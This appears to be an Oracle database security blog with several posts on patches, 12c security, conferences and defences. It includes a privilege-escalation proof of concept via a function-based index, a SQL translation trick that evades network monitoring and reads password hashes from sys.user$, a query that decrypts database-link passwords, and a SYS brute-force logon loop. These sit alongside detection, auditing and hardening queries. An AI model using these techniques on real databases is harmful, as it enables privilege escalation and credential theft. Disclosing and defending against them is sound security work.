Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)


April 2014 CPU

Hi Oracle Security Folks,

Thanks to Oracle for fixing a batch of research I sent over in August 2013 regarding ADVISOR, DIRECTORIES, GAOP (GRANT ANY OBJECT PRIVILEGE) and also a critical privilege escalation which gains 8.5 in the CPU, which I am not going to publish here as I want to give folks time to patch. Both of the issues fixed in the April DB Patch are from me this time.

Note that the CVSS 8.5 was not discussed at any conferences – it’s new. Actually the CVSS 8.5 is detailed in my new book, which has just come out after the patch release and is available from Apress and Amazon. There is some new exploit research in there but the main thrust of the book is Defense and Protection – especially using Enterprise Manager/Cloud Control to defend an estate and how to secure privileged access control mechanisms such as breakglass. I am very honored that Jonathan Gennick edited the book, Arup Nanda technically reviewed the book, and that Slavik Markovich – CTO of McAfee – wrote a kind foreword to the book as well. There have also been quite a few other folks involved whom I list in the Acknowledgements section. It’s taken a year to write so hopefully you will like it.

Anyhow more detail to come on that in the future. For now I recommend installing the patch and reading the book…though it has to be said – that was where I was 9 months ago..and the world has not stopped spinning yet…Global SCN still rising :) but hopefully no maximum in sight yet!

Keep safe,


Hello Oracle Security Readers,

If we combine the following factors, we can identify an escalation route from an index on a SYSTEM-owned table to SYSDBA which does not require SELECT privileges on the indexed table:

1. SYSTEM passes its DBA role through its procedures.

2. Oracle indexes allow execution via functions, i.e. a function-based INDEX can execute a function.

3. Oracle analyses indexes before they are used.

The PoC code is below:



create user test identified by o; 
grant create session, create procedure, create any index to test; 

SQL*Plus: Release Production on Wed Dec 11 09:47:26 2013 
Copyright (c) 1982, 2010, Oracle.  All rights reserved. 
Connected to: 
Oracle Database 11g Enterprise Edition Release - Production 
With the Partitioning, OLAP, Data Mining and Real Application Testing options 

SQL> conn test/o 

Function created. 

SQL> grant execute on test.y to public; 
Grant succeeded. 

SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name')); 
Index created. 

SQL> set role dba;  
Role set.

So the ability to create an index can lead to SYSDBA. Oracle has made the above more difficult to achieve in 12c by adding an INHERIT privilege requirement which blocks the above code, and that represents another good reason to upgrade from 11g to 12c. I discuss this in my new book along with other issues, for publication in April, and already available to purchase in Alpha format at this URL.
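As an added example (not from the original post, and not Oracle's code), here is how a DBA could review the preconditions of the above from the defending side: who holds CREATE ANY INDEX, which function-based indexes sit on SYS/SYSTEM tables, and (12c) who inherits whose privileges. The dictionary views and the INHERIT PRIVILEGES object privilege are standard; the default grant of INHERIT PRIVILEGES to PUBLIC is as documented by Oracle for 12c.

```sql
-- Added example: defender-side review of the index escalation preconditions.

-- 1. Who holds CREATE ANY INDEX (directly or through a role)?
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY INDEX'
ORDER  BY grantee;

-- 2. Function-based indexes on tables owned by privileged schemas. The post shows
--    an index on a SYSTEM table calling a function from another schema, so list
--    every such index together with its expression for manual review.
--    (COLUMN_EXPRESSION is a LONG, so it is displayed rather than filtered.)
SELECT i.owner, i.index_name, i.table_owner, i.table_name, e.column_expression
FROM   dba_indexes i
JOIN   dba_ind_expressions e
       ON  e.index_owner = i.owner
       AND e.index_name  = i.index_name
WHERE  i.index_type  LIKE 'FUNCTION-BASED%'
AND    i.table_owner IN ('SYS', 'SYSTEM')
ORDER  BY i.owner, i.index_name;

-- 3. 12c: INHERIT PRIVILEGES decides whether a unit owner may make use of the
--    privileges of the user whose context the unit runs in. On a fresh 12c
--    database PUBLIC is granted INHERIT PRIVILEGES on every user, so list the
--    grants and revoke PUBLIC's inheritance from powerful accounts.
SELECT grantee, owner AS inherited_from, table_name, privilege
FROM   dba_tab_privs
WHERE  privilege = 'INHERIT PRIVILEGES'
ORDER  BY owner, grantee;

-- 12c only; repeat for each privileged account you want to protect:
-- REVOKE INHERIT PRIVILEGES ON USER system FROM PUBLIC;
```

The first two queries work on 11g as well; the third only returns rows on 12c, where the privilege exists.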

What sort of defences have organisations been using recently to combat attacks like the above? Surprisingly there has still been a large focus on network monitoring to implement DB Security. I say surprisingly because new DB Sec research has been focused for a while on controlling internal high privilege within the DB. A privileged account can bypass network monitoring even if it is host-based. A good example of bypassing a host-based network monitor (e.g. SNORT/Guardium et al) is the dbms_sql_translator package introduced with 12c, demonstrated below:

conn / as sysdba

SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');

PL/SQL procedure successfully completed.

SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';


SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$');

PL/SQL procedure successfully completed.

SQL> alter session set sql_translation_profile = BYPASSNETMON;

Session altered.

SQL> alter session set events = '10601 trace name context forever, level 32';

Session altered.

SQL> select username from dba_users;




To achieve this monitoring bypass all that is required is the CREATE SQL TRANSLATION PROFILE privilege and ALTER SESSION. Gaining ALTER SESSION has been achievable, as my previous book showed.

And there are other methods to gain ALTER SESSION in newer versions of Oracle DB, and the CREATE SQL TRANSLATION PROFILE privilege is only needed at creation time, so verifying that a session is not being translated surreptitiously requires some expertise. More to come on this.

Ready-made methods of alerting on unauthorised use of dbms_sql_translator are the native audit trail or, for high-security scenarios, a memory monitor such as McAfee’s DB Sec monitoring tool, which provides high protection.
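As an added example (not from the original post), here is the checking and auditing a DBA could put in place for the translation bypass above: who can create profiles, which profiles and translations exist, which sessions currently have a profile set, and native audit of the package and privileges involved. The DBA_SQL_TRANSLATION_PROFILES and DBA_SQL_TRANSLATIONS views and the V$SESSION.SQL_TRANSLATION_PROFILE_ID column are 12c features; the join of that column to DBA_OBJECTS follows the post's own use of dba_objects to look up the profile.

```sql
-- Added example: detect and audit SQL translation profiles (12c).

-- 1. Who can create or use translation profiles at all?
SELECT grantee, privilege, admin_option
FROM   dba_sys_privs
WHERE  privilege LIKE '%SQL TRANSLATION%'
OR     privilege = 'TRANSLATE ANY SQL'
ORDER  BY grantee, privilege;

-- 2. Every profile and every registered translation, i.e. what a statement is
--    silently rewritten to. A monitor that only sees the original text misses this.
SELECT p.owner, p.profile_name, t.sql_text, t.translated_text, t.enabled
FROM   dba_sql_translation_profiles p
LEFT   JOIN dba_sql_translations t
       ON  t.owner        = p.owner
       AND t.profile_name = p.profile_name
ORDER  BY p.owner, p.profile_name;

-- 3. Sessions that currently have a translation profile set. The profile's
--    object_id is exposed in V$SESSION.SQL_TRANSLATION_PROFILE_ID and resolved
--    through DBA_OBJECTS (object_type 'SQL TRANSLATION PROFILE').
SELECT s.sid, s.serial#, s.username, s.program,
       o.owner, o.object_name AS profile_name
FROM   v$session s
JOIN   dba_objects o ON o.object_id = s.sql_translation_profile_id
WHERE  o.object_type = 'SQL TRANSLATION PROFILE';

-- 4. Native audit trail: one record per call/use (BY ACCESS) for the package
--    and for the two privileges the bypass needs.
AUDIT EXECUTE ON sys.dbms_sql_translator BY ACCESS;
AUDIT CREATE SQL TRANSLATION PROFILE BY ACCESS;
AUDIT ALTER SESSION BY ACCESS;
```

Query 3 is the one to schedule, since a profile only has to be created once and can then be switched on per session with ALTER SESSION; query 2 tells you what it does when it is on.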

There are positives from a security perspective in 12c, and of course with Oracle we can add our own defenses. The new book adds the following protections, among others:

  1. Incoming DB Link blocking using Native IPS
  2. Forensic rootkit detection
  3. Break-glass Access Control security
  4. Automated statechecking from root
  5. Adaptive security response using EM12c
  6. Fine grained user management
  7. Centralised audit trail lifecycle
  8. Vulnerability scanning for verification using Perl
  9. Securing privileged access control
  10. 12c decryptions and defenses

Anyway I won’t spoil the surprise – so enjoy your weekends!


Paul M. Wright

P.S. Commenting works now as the Maths Captcha plugin has dealt with the spambots


Hi Guys,

OOW was the trip of a lifetime. Watching Oracle USA win the cup with Ben Ainslie was great, as was watching Larry’s keynote live. Columnar in memory DB looks interesting and competition for Hana.

I presented at the excellent Delphix event with OakTable, and picked up some good information to finalise some more book chapters.

It was good to meet Steven Karam as we had a discussion about ALTER USER IDENTIFIED BY VALUES bypassing account expiry. This is a security loophole in my experience, as it will enable legacy app account owners to avoid renewing their passwords if the Prod DBA expires them.

Off to Hacktivity tomorrow in Hungary to give a talk there on Friday 11th October at 12.40pm

I will discuss some of the 12c research which is going into the book, which includes new privilege escalations and a new solution to block all incoming database links, which I am quite pleased with.

More details at hacktivity. See you there!

P.S. Amazon is taking pre-orders I note

OOW and Oak Table

Hi Oracle Security Readers,
OOW is here again and I will be giving a short “In a nutshell” presentation on 12c security which will include – 3 good and 3 not so good points about 12c, as well as future research directions. 
The presentation will be at Table World
This can be regarded as a short taster for the upcoming book.

You know 12c does have some good features e.g. Definer Roles for Program Units, which works well, and has the potential to solve the majority of privilege escalations by removing the need for PUBLIC. Also TCPS is free on all DB versions now which is really great. Lots of work needed to test this upgrade integrates with other servers..

However there are some serious issues with GA as a release, and also some design weaknesses that need to be borne in mind when implementing 12c. Additionally some of the issues found whilst testing 12c do port back to which is a concern now.

I will be discussing the defenses to some of these issues in my Oak Table Presentation, and then later at Hacktivity in October, so OOW will get the defenses first!

Look forward to seeing you in San Francisco. Lastly I am in the process of transitioning general Oracle Security posts to www.OracleSecurity.Com which is hosted in the US.



Hi Oracle Security Folks,

Yes indeed, 12c is out. I have been working on 12c for 1.5 years and gave the first external 12c security presentation (of which I am aware) at UKOUG 2012 in Birmingham, so it is good to see that the product has finally been released. I like that the consolidation features are optional now. A lot of the currently unpublished 12c security research will be going into my Apress book Protecting Oracle (12c), due out in November, but I will be able to give some tasters here as we progress..

Firstly, thank you to Dani Schnider of Trivadis for referencing my Database Link Security paper.
Dani’s paper is available at this URL and here in English translated by Google. Dani describes the idea of limiting a DB link to a specific account and then adding a context variable to legitimate DB Link logins using that account, which can then be used by the receiving database to grant access or not, using a trigger which checks for the correct context variable.

CREATE OR REPLACE TRIGGER dbl_logon_trg
AFTER LOGON ON DATABASE
DECLARE
  v_username VARCHAR2(30)  := sys_context('USERENV','SESSION_USER');
  v_dbl_info VARCHAR2(200) := sys_context('USERENV','DBLINK_INFO');
BEGIN
  IF v_username = 'ETL_USER' THEN
    IF v_dbl_info IS NULL THEN
      -- no DBLINK_INFO: the link account logged on directly, not over a link
      write_log('failed: direct login', v_username, v_dbl_info);
      raise_application_error(-20101, 'Direct login not allowed.');
    ELSIF v_dbl_info NOT LIKE '%EXPECTED_SOURCE_OR_LINK%' THEN
      -- placeholder pattern: the permitted source database/link is not given in the post
      write_log('failed: wrong dblink', v_username, v_dbl_info);
      raise_application_error(-20102, 'Login from wrong database link not allowed.');
    ELSE
      write_log('successful login', v_username, v_dbl_info);
    END IF;
  END IF;
END dbl_logon_trg;
/

This is good advice but does not attempt to address the wider issue of how to stop incoming links for all accounts. That is more complex needing “Native Intrusion Protection”…more to come on this in the book.

My DB Link paper was also picked up by, and it is nice to see Oracle openly discussing vulnerability. Mr A.C. Hobbs would approve.

Gary Myers also kindly added observations regarding the transportation of a database link from one DB to another (as discussed on oracle-l). This feature still works in below — though the ciphertext is longer now..


Database link created.

SQL> SELECT DBMS_METADATA.GET_DDL('DB_LINK',a.db_link,a.owner) FROM dba_db_links a;



SQL> select * from v$version;

Oracle Database 11g Enterprise Edition Release - 64bit Production
PL/SQL Release - Production
CORE      Production
TNS for 64-bit Windows: Version - Production
NLSRTL Version - Production

In my experience having possession of a copy of the ciphertext to create a copy of the link has a much lower impact than gaining the plaintext. The problem is that the plaintext passwords of low-privilege dblinks are often the same as those of the other system accounts.

Of course database links have completely changed how the encryption algorithm works –> it is the same method as 12c. More on this in the book, in November.
It may be a good idea to reset those DB Link passwords to unique values. 11.2 and above allow you to alter the password of the dblink directly with this command, another improvement from Oracle.

ALTER DATABASE LINK private_link CONNECT TO hr IDENTIFIED BY hr_new_password;

Database Links are interesting, but in terms of relative risk, the issue of remote SYS brute forcing has caused more concern than any other, partly due to the inability to mitigate. You will probably remember my SYS connection throttler, which was a DIY mitigation to the remote brute forcing issue documented in 2007 (needs FFox).

Well here is some very good news as Oracle have implemented my recommendation, given before and during the Beta, to add a simple hidden parameter to slow down remote SYS brute forcing – and it is set to TRUE by default!

Introducing _sys_logon_delay (beams proudly at new parameter).

This addresses one of the biggest security concerns and I commend Oracle for following my recommendations. The point of this simple delay function is that users will be able to understand it and therefore use it confidently.

while true;do sqlplus -S -L sys/wrongpw@orlin:1521/orcl3 as sysdba;sleep 0;done;

ORA-01017: invalid username/password; logon denied
8< --- Slow steady pace between failed logons thus making remote brute force infeasible.

--can set to 0 to disable, or to higher value to slow down attacker, but needs a restart.
--e.g. alter system set "_sys_logon_delay"=0 scope=spfile;

SQL> select banner from v$version;

Oracle Database 12c Enterprise Edition Release - 64bit Production
PL/SQL Release - Production
CORE      Production
TNS for Linux: Version - Production
NLSRTL Version - Production

Let’s have a look and see what the new parameter looks like:

SQL> select a.ksppinm name, b.ksppstvl value, b.ksppstdf deflt,
            decode(a.ksppity, 1, 'boolean',
                              2, 'string',
                              3, 'number',
                              4, 'file', a.ksppity) type,
            a.ksppdesc description
     from   sys.x$ksppi  a,
            sys.x$ksppcv b
     where  a.indx = b.indx
     and    a.ksppinm = '_sys_logon_delay';

--------- ----------------------------------------
TRUE	  number
failed logon delay for sys

It is satisfying to see a large company react positively to customer feedback and to have helped fix this problem. Thanks to everyone involved. There are of course many other problems to solve, as we shall see in due course.

Lastly, courtesy of Oracle/Apress I will be at OOW/JavaOne in September, taking part in a publishing seminar, and looking forward to seeing you there in sunny SF.


Another Java Security Alert

Hi Oracle Security Folks,

Following the tradition for one-off Java Security Alerts
Oracle Critical Patch Updates and Security Alerts:

Oracle Security Alert for CVE-2013-1493:

The reporters say it is an unreliable exploit. Of course it depends on Java being used in the browser so one fix is to unplug the JVM from the browser.

For the past ten years I have only used Java as a server side technology, where it is actually making leaps and bounds. I had the pleasure of taking an Oracle Professional Training class on Java 7 new features recently and there are some very nice concurrency features that make separating and delegating tasks a lot easier to accomplish. This has made Java the predominant language of choice for Universities, and also increased the usage of Netbeans IDE which I have found to be more stable than Eclipse and certainly better for writing JDBC applications. My point is that I think the technologists at Oracle are actually doing quite a good job with Java…back to the DB now in prep for 12c..excitement mounts..


Oracle Dictionary Integrity Health Check


It is good to check the integrity or health of a system to avoid future problems.

SQL> exec DBMS_HM.RUN_CHECK('Dictionary Integrity Check', 'my_run');

SET LONG 100000
-- the report for the named run is fetched with GET_RUN_REPORT
SQL> SELECT DBMS_HM.GET_RUN_REPORT('my_run') FROM DUAL;



Basic Run Information
Run Name : my_run
Run Id : 141
Check Name : Dictionary Integrity Check
Start Time : 2013-02-10 13:46:11.861572 +00:00
End Time : 2013-02-10 13:50:43.713326 +00:00
Error Encountered : 0
Source Incident Id : 0
Number of Incidents Created : 0

Input Parameters for the Run

Run Findings And Recommendations
Finding Name : Dictionary Inconsistency
Finding ID : 142
Status : OPEN
Priority : CRITICAL
Message : SQL dictionary health check: file$ pk 42 on object FILE$
Message : Damaged rowid is AAAAARAABAAAADpAAC – description: Filename
/home/oracle/app/oracle/oradata/orcl/pdbseed/system01.dbf is

Crikey – lots of output – but what does it all mean?

SQL> SELECT AVG(dbms_utility.get_hash_value(text,1000000000,power(2,30))) FROM DBA_SOURCE WHERE OWNER='SYS';

Ahh my dictionary is same as before…cool
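The single average above tells you that something changed, not what. As an added example (not from the original post), here is the same idea kept per object: a baseline table of hashes of SYS source, and a later query that reports which units were changed, added or removed. The table name sec_dict_baseline is made up for the example; the hash function and parameters are the ones used in the post, weighted by line number so that reordered lines are caught too.

```sql
-- Added example: per-object fingerprint of SYS source for change detection.
-- sec_dict_baseline is an assumed name. Weighting each line's hash by its line
-- number means swapping two lines changes the sum, unlike a plain SUM or AVG.

CREATE TABLE sec_dict_baseline AS
SELECT owner, name, type,
       COUNT(*) AS line_count,
       SUM(line * dbms_utility.get_hash_value(text, 1000000000, POWER(2, 30))) AS src_hash
FROM   dba_source
WHERE  owner = 'SYS'
GROUP  BY owner, name, type;

-- Run later (e.g. after a patch or on a schedule): anything not identical to the
-- baseline is listed with the kind of difference.
WITH cur AS (
  SELECT owner, name, type,
         COUNT(*) AS line_count,
         SUM(line * dbms_utility.get_hash_value(text, 1000000000, POWER(2, 30))) AS src_hash
  FROM   dba_source
  WHERE  owner = 'SYS'
  GROUP  BY owner, name, type
)
SELECT COALESCE(b.name, c.name) AS name,
       COALESCE(b.type, c.type) AS type,
       CASE
         WHEN b.name IS NULL THEN 'ADDED'
         WHEN c.name IS NULL THEN 'REMOVED'
         ELSE 'CHANGED'
       END AS status
FROM   sec_dict_baseline b
FULL   OUTER JOIN cur c
       ON  c.owner = b.owner
       AND c.name  = b.name
       AND c.type  = b.type
WHERE  b.name IS NULL
OR     c.name IS NULL
OR     b.src_hash   <> c.src_hash
OR     b.line_count <> c.line_count
ORDER  BY status, type, name;
```

Since anyone who can alter SYS source can also alter the baseline table, export the baseline (or at least the hashes) off the database after each legitimate patch and compare against that copy, not only against the in-database table.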

SQL> select banner from v$version;

Oracle Database 12c Enterprise Edition Release - 64bit Beta
PL/SQL Release - Beta
TNS for Linux: Version - Beta
NLSRTL Version - Beta


Java Security Alert

New Year – New vulnerabilities…yes it’s alert season again, with the main patch out on the 15th, but an out of band alert today for the Java 0 day. It is good to see Oracle taking this well publicised issue so seriously.

Here is the alert –

For an excellent advanced analysis please see this verified pdf

For a more layman’s overview of Java Security this pdf is useful

I taught the first publicly available Java Security Course outside of the US in 2007 at SANS London, and wrote the first Java Security exam (GSSP), and wrote and presented the first “Java Top 10 Security issues” in Orlando 2008 – which is still very relevant – and back then the story was the same as it is today… — Java applets are insecure – don’t use them – and strongly consider turning off Java in browsers.
Server-side Java is still a dominant language and probably will be for a while, though Java in the Database itself has had both security and performance issues…as well as questions as to why use Java in the DB – is it to bring more processing to the DB to increase licensing for Oracle, say the cynics, OR to enable less network transactions between app and db pulling data backwards and forwards? Obviously it is nice to have a choice, but PL is a more efficient way to interact with the DB locally.
A larger question in many folks minds will be why use Java at all? It was made popular because Sun had made it cross-platform, but does Oracle have the same cross-platform credibility as Sun? A JVM is slower than native so if x-platform is less of a factor perhaps C will make a comeback. This logic is borne out by Personally, I do a lot of text file log manipulation so I still use Perl as it is quicker (and have been recommended to try LUA – on the todos), and am intrigued by DBIx
Agreed, for database connectivity JDBC is still king, so I am still glad I learnt Java at uni many moons ago, but the crux to this is that Java’s expansion market has been Android and the fear is that Oracle’s lawyers scare companies from innovating with the technology in a cross-platform like way. I hope the concept of “Java Stewardship” extends to the legal department.

Anyway, lets hope that the new Oracle patch is reliable.

Keep safe,

UKOUG 2012 in a nutshell

Hi Oracle Security Folks,

UKOUG 2012 in a nutshell:

OAK Table day highlight was Julian’s analysis of RAT capture formats, which made reverse engineering proprietary formats look a lot easier than it should do. Christian’s super secret talk was so secret that it was not given, but managed to catch up on that later.

Monday my presentation was surprisingly full up (Ok it was a small room), and no one fell asleep or ran screaming so that classifies it as successful in my book. The slides are on UKOUG’s web site but require a logon. In truth the talk went very well and the audience genuinely seemed to appreciate the hard work I had put in, and the contribution made by Co-speaker Philip Weedon.

Afterwards, I wandered over to Grant Allen’s Talk. Grant made contributions from a Unix perspective including how to log bash commands to syslog (cool) and re-iterated the benefits of centralising the audit trail. Had a chat after and started the post talk celebrations which resulted in going to bed at breakfast time. So that’s why they call it “Bed and Breakfast”. The rest of the two days should be annotated with the fact that it took me approximately two days to recover from the Monday night, but it was worth it as had some very interesting talks about how DBA privilege is actually managed – in practice – which is different from the typical Identity Management perspective…more to come on this..

Tuesday was a later start and helped Pete with the Oracle Security Roundtable which was well attended with lively discussion.
Then Tom’s 12c talk which had some security perspectives. Tom’s presentation skills are second to none and he interacted with Hall 1 audience very naturally. What we know is there are a lot of new features for security in 12c as well a lot of extra products that can be purchased to enhance the security of the database.
Conversely I think the actual core security of the central product has been degraded in some ways. For instance password complexity, account locking, password history, failed login throttling etc are no longer effective on SYS in 11 upwards..and many of the OraSec “experts” and DBA Managers are not aware of this because they are bombarded with extraneous information about extra addons which do not cure the core weaknesses.
I published sys_throttler to address this but a full solution is not we can say that Oracle Security is not solved yet.

After Tom we headed to Gregory’s Identity Management talk which was a good overview of how to use OVD to manage DB users, and highlighted that Oracle can unexpectedly support two separate authentication mechanisms for one user (ref Pete), which is something I also alluded to in

Identity Management of lower privileged accounts in Oracle is a good thing, but it certainly becomes more difficult once the users are privileged as they can break the chains that bind them….hence the requirement for a comp balance like auditing..

Pete’s Wednesday 9 AM talk on audit trails, was a bit cloudy in my mind first time round, but reading the slides now they are making sense.
Pete showed using client_identifier as central identity through core audit…excellent battle worn advice.
Also discussed identifying sql injections and killing the session automatically…but difficult for a session to kill itself. This would be handy when trying to automatically defend against an attack. Obviously it is possible to call out to the OS but within the DB this is not so easy…work to do again.
Also Pete mentioned using a trigger to enable core audit to save on performance.
A lot of this changes in 12c but the concepts were very interesting…
Pete then transferred to DBA access control mode and described how the power of the DBA can be controlled through individual proxy users proxying to a core dba role which is customised. This is a good strategy for BAU. The problem is of course that to carry out imports/exports and user management the ALTER USER privilege is needed and any user with this or execute on dbms_sys_sql etc can act as a different user so it is not a solution for highest privilege.
Breakglass and time-based access control is the way forward for taming the top dog privileges in my view/experience…though splitting SYSDBA into separate system privileges goes towards taming SYS e.g. SYSBACKUP and SYSAUD et al.

Pythian were prominent with some interesting work on Human reliability and Privileged Access Monitoring. Absolute applications were busy with their training offerings and DSP had 6 presentations so the vendor element looked healthy.

I would have liked to have gone to…
-Guido Schmutz’s NoSQL presentation but the PDF reads well.
-Carl Dudley’s Audit trail presentation was thorough and of immediate practicable use in 11g.
-Owen Ireland’s Goldengate presentation is an excellent quick start intro for DBA.
-Hitachi’s Muthukumar did a detailed presentation on localisation in Oracle for EU.
-Portix’s Bjorn Rost did an informative presentation on Total Recall listing the virtual columns and AS OF syntax.
Of course there are loads others, these are just the presentations that caught my eye.

The general opinion was that the conference was better than last year. I can’t vouch for that as I wasn’t there last year due to work commitments, but I certainly enjoyed catching up with old friends. Next year I am informed the conference for DB will be in Manchester which is the home of my MSc CS department, Mr Turing, and some of the best music to grace our charts, as well as a special breed of mega pub (ref Moon Under the Water), though the Lass O’ Gowrie aims for quality rather than quantity. In short Manchester is literally a cool place and thankfully still serviced by Virgin trains, so see you there next year.

Thank you to all the excellent presenters this year who have increased my understanding yet again.
It is interesting to see how California’s Oracle User group compares


SYS Security

Hello Folks,

A few people have told me that they thought only SYS could select db link passwords.
Truth is any user with SELECT_CATALOG_ROLE can select the passwords from ku$_dblink_view as well.

SQL> select name, userid, utl_raw.cast_to_varchar2(dbms_crypto.decrypt((substr(passwordx,19)), 4353, (substr(passwordx,3,16)))) password from ku$_dblink_view;


If EXECUTE on dbms_crypto is missing then the ciphertext may need to be copied over to another DB under the control of the attacker.

ku$_dblink_view select from SELECT_CATALOG_ROLE is fixed in and above, as is the “stealth password cracking vulnerability” which has gained a lot of attention, and resulted in updates to John and Ettercap.

So which account would be the likely target of this stealth attack? …
The only account that is guaranteed to be present and unlocked is SYS..
For both the stealth brute force and my orabrute style brute force the primary defence is the strength of the SYS password.
If the SYS password is a 15 character passphrase that is changed regularly then the attacks are ineffective. So how to ensure SYS password is complex and the account is secure?
Problem is SYS is immune to profiles in 11g, so no password history, no account locking, and no failed logon delay and crucially no password complexity function.
The SYS password could be ‘a’ and no-one else would be the wiser.

[oracle@localhost ~]$ sqlplus sys/lowsec@localhost/orcl as sysdba

SQL*Plus: Release Production on Wed Nov 28 20:40:57 2012

Copyright (c) 1982, 2010, Oracle.  All rights reserved.

Connected to:
Oracle Database 11g Enterprise Edition Release - Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> alter user sys identified by a;

User altered.

SQL> alter user system identified by a;
alter user system identified by a
ERROR at line 1:
ORA-28003: password verification for the specified password failed
ORA-20001: Password length less than 8

The DBA might not even realise the password is ‘a’ if they are coming in through Unix “/ as sysdba”.
SYS can even silently turn off its own audit through oradebug so no record of the attack either.
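As an added example (not from the original post), here is the handful of server-side controls that do still bite on SYS when the profile controls do not, pulled into one check with a remark against each value. The parameters and views are standard 11g; the "expected" values are this example's choices, not the post's, and REMOTE_LOGIN_PASSWORDFILE is flagged for review rather than prescribed because RMAN and Data Guard setups may need remote SYSDBA.

```sql
-- Added example: what can be enforced on SYS in 11g without a profile.
SELECT name, value,
       CASE name
         WHEN 'audit_sys_operations' THEN
           CASE WHEN UPPER(value) <> 'TRUE'
                THEN 'ENABLE: SYS actions (including oradebug) go to the OS audit trail'
                ELSE 'ok' END
         WHEN 'remote_login_passwordfile' THEN
           CASE WHEN UPPER(value) <> 'NONE'
                THEN 'REVIEW: remote "sys as sysdba" logon is possible'
                ELSE 'ok' END
         WHEN 'sec_case_sensitive_logon' THEN
           CASE WHEN UPPER(value) <> 'TRUE'
                THEN 'ENABLE: case-insensitive passwords shrink the keyspace'
                ELSE 'ok' END
         WHEN 'sec_max_failed_login_attempts' THEN
           CASE WHEN TO_NUMBER(value) > 5
                THEN 'LOWER: failed attempts per connection before the server drops it'
                ELSE 'ok' END
       END AS advice
FROM   v$parameter
WHERE  name IN ('audit_sys_operations', 'remote_login_passwordfile',
                'sec_case_sensitive_logon', 'sec_max_failed_login_attempts')
ORDER  BY name;

-- Who is in the password file, i.e. who can connect AS SYSDBA/SYSOPER remotely at all?
SELECT username, sysdba, sysoper
FROM   v$pwfile_users;

-- When was the SYS password last changed? Profiles do not age it, so check by hand.
SELECT name, ptime AS password_changed, ctime AS created
FROM   sys.user$
WHERE  name = 'SYS';
```

None of this adds complexity checking to SYS; the post's point stands that the password can be ‘a’. What the check gives you is a record of SYS activity, a short list of who can reach SYS remotely, and a date to hold the password rotation against.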

So SYS really is “special”, but will this improve in 12c…? Answers at UKOUG.